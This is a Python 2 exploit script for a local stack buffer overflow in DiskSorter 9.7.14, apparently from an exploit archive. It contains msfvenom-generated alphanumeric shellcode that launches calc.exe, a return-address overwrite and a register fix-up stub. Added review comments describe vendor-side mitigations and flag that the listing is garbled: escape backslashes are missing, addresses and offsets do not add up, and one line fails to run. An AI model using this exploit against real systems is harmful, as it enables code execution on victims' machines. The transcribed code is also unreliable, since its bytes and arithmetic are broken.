
Disk Sorter 9.7.14 Input Directory Buffer Overflow

Posted on 13 June 2017

#!/usr/bin/python
###############################################################################
# Exploit Title: DiskSorter v9.7.14 - Local Buffer Overflow
# Date: 10-06-2017
# Exploit Author: abatchy17 -- @abatchy17
# Vulnerable Software: DiskSorter v9.7.14
# Vendor Homepage: http://www.disksorter.com/
# Version: 9.7.14
# Software Link: http://www.disksorter.com/setups/disksorter_setup_v9.7.14.exe
# Tested On: Windows XP SP3
#
# To trigger the exploit, paste the content of exploit.txt into "Add Input Directory" text box
#
# Credit to n3ckD_ for discovering the DoS exploit
#
# Challenges to convert this DoS to code execution:
# 1. Program doesn't accept non ASCII characters (0x01 to 0xff are okay-ish)
# 2. Buffer at ESP splits string if it contains a "", this is bad since POP ESP is 0x5c
# 3. Had to write custom shellcode to get the exact location of alphanumeric shellcode in memory
#
# +----------------------------------+
# |1 custom shellcode == 1 dead llama|
# +----------------------------------+
#
##############################################################################
#
# NOTE(review): this listing is garbled by extraction. Every "\x.." escape
# below has lost its backslash (the literals now read as plain ASCII letters
# and digits rather than the intended byte values), and the backslash quoted
# in challenge 2 above is missing for the same reason. The code is left
# byte-for-byte as transcribed; the comments describe the intent, not what
# the transcribed literals would actually produce.
#
# Defender summary (as far as the header and layout below support it): the
# "Add Input Directory" text is copied into what is presumably a fixed-size
# stack buffer without a length check, so an over-long path overwrites the
# saved return address. The mona output quoted below reports the gadget
# module (QtGui4.dll) as non-ASLR / non-rebased / no SafeSEH, which is what
# makes a hard-coded return address reliable. The vendor-side fix is a bound
# on the path length before the copy, and building the binary and its DLLs
# with stack cookies (/GS), /DYNAMICBASE and /SAFESEH so that neither a fixed
# gadget address nor an unprotected return address is available.
#
# Python 2 script (shebang + str concatenation of byte escapes); under
# Python 3 open(..., "w") would text-encode the string — verify before reuse.

# Output file the payload is written to. A `with open(...)` block would be
# safer: the handle is closed even if building `data` raises (it does, see
# the unary-plus note at `junk` below).
a = open("exploit.txt", "w")

# Message= 0x651f214e : jmp esp | asciiprint,ascii {PAGE_EXECUTE_READ} [QtGui4.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False

# Bytes the input box does not pass through unchanged; intended values are
# 0x0a (LF), 0x0d (CR) and 0x2f ('/'). Same list is passed to msfvenom below.
badchars = "x0ax0dx2f"

# msfvenom -a x86 --platform windows -p windows/exec CMD=calc.exe -e x86/alpha_mixed BufferRegister=EAX -f python -b "x0ax0dx2f"
# Encoder output from the command above: an alphanumeric-only payload.
# BufferRegister=EAX means the decoder expects EAX to point at its own first
# byte when it runs; the `llamaleftovers` stub below exists to set that up.
buf = ""
buf += "x50x59x49x49x49x49x49x49x49x49x49x49x49"
buf += "x49x49x49x49x49x37x51x5ax6ax41x58x50x30"
buf += "x41x30x41x6bx41x41x51x32x41x42x32x42x42"
buf += "x30x42x42x41x42x58x50x38x41x42x75x4ax49"
buf += "x6bx4cx5ax48x4fx72x57x70x75x50x43x30x43"
buf += "x50x4bx39x4dx35x44x71x79x50x63x54x6ex6b"
buf += "x62x70x76x50x6ex6bx42x72x46x6cx6ex6bx63"
buf += "x62x62x34x6cx4bx43x42x76x48x36x6fx68x37"
buf += "x73x7ax46x46x74x71x49x6fx4ex4cx57x4cx55"
buf += "x31x51x6cx35x52x46x4cx51x30x6ax61x6ax6f"
buf += "x64x4dx67x71x6bx77x79x72x68x72x70x52x70"
buf += "x57x6cx4bx53x62x36x70x6cx4bx52x6ax67x4c"
buf += "x4cx4bx50x4cx62x31x42x58x79x73x32x68x37"
buf += "x71x4ax71x73x61x4ex6bx63x69x31x30x35x51"
buf += "x69x43x4cx4bx50x49x64x58x58x63x46x5ax32"
buf += "x69x6ex6bx36x54x4ex6bx57x71x38x56x65x61"
buf += "x49x6fx6ex4cx69x51x7ax6fx66x6dx46x61x69"
buf += "x57x70x38x39x70x33x45x39x66x35x53x31x6d"
buf += "x68x78x75x6bx73x4dx71x34x70x75x38x64x33"
buf += "x68x4ex6bx32x78x51x34x65x51x39x43x31x76"
buf += "x4cx4bx64x4cx32x6bx6ex6bx62x78x65x4cx47"
buf += "x71x59x43x4cx4bx44x44x4cx4bx56x61x38x50"
buf += "x6fx79x52x64x54x64x34x64x63x6bx73x6bx50"
buf += "x61x50x59x71x4ax56x31x59x6fx59x70x33x6f"
buf += "x53x6fx71x4ax4cx4bx44x52x68x6bx6ex6dx53"
buf += "x6dx62x4ax56x61x4cx4dx6bx35x6dx62x75x50"
buf += "x45x50x75x50x32x70x32x48x76x51x4ex6bx30"
buf += "x6fx6fx77x39x6fx4ex35x4dx6bx58x70x4dx65"
buf += "x4ex42x53x66x62x48x6dx76x4ax35x6dx6dx4d"
buf += "x4dx69x6fx79x45x57x4cx46x66x53x4cx56x6a"
buf += "x6fx70x49x6bx6dx30x33x45x33x35x4dx6bx50"
buf += "x47x37x63x74x32x52x4fx53x5ax43x30x53x63"
buf += "x49x6fx38x55x52x43x63x51x50x6cx65x33x54"
buf += "x6ex62x45x54x38x62x45x55x50x41x41"

# Return-address overwrite, 4 bytes little-endian. As transcribed the bytes
# decode to 0x651c541f, which is NOT the 0x651f214e JMP ESP quoted in the
# mona line above — presumably a JMP EBP in the same module, but that address
# is not documented anywhere on the page.
jmpebp = "x1fx54x1cx65" # Why JMP EBP? Buffer at ESP is split, bad!

# Stub that derives the payload's address from EBP using only byte values the
# input box accepts (challenge 1 above), then leaves it in EAX for the
# BufferRegister=EAX decoder.
# NOTE(review): the three immediates as transcribed (0x55555555, 0x55555555,
# 0x55555656) sum to 0x100 mod 2^32, so the "+ 209" figure in the inline
# comment does not follow from these bytes; treat the offsets as illustrative.
llamaleftovers = (
    "x55" # push EBP
    "x58" # pop EAX
    "x05x55x55x55x55" # add EAX, 0x55555555
    "x05x55x55x55x55" # add EAX, 0x55555555
    "x05x56x56x55x55" # add EAX, 0x55555656 -> EAX = EBP + 209
    "x40" # inc EAX, shellcode generated should start exactly here (EBP + 210) as we're using the x86/alpha_mixed with BufferRegister to get a purely alphanumeric shellcode
)

# Padding between the stub and the payload (1 + 2*105 = 211 bytes).
# NOTE(review): the stray second "+" parses as "x55" + (+"x53x5b") * 105, and
# unary plus on a str raises TypeError — as transcribed the script fails on
# this line and never reaches a.write(). Probably a transcription artifact.
junk = "x55" + + "x53x5b" * 105

# Final layout: 4096 filler bytes, the 4-byte return-address overwrite, a
# 40-byte sled of 0x40/0x48 pairs (INC EAX / DEC EAX when read as x86), the
# EAX fix-up stub, padding, then the encoded payload.
data = "A"*4096 + jmpebp + "x40x48" * 20 + llamaleftovers + junk + buf
a.write(data)
a.close()

 
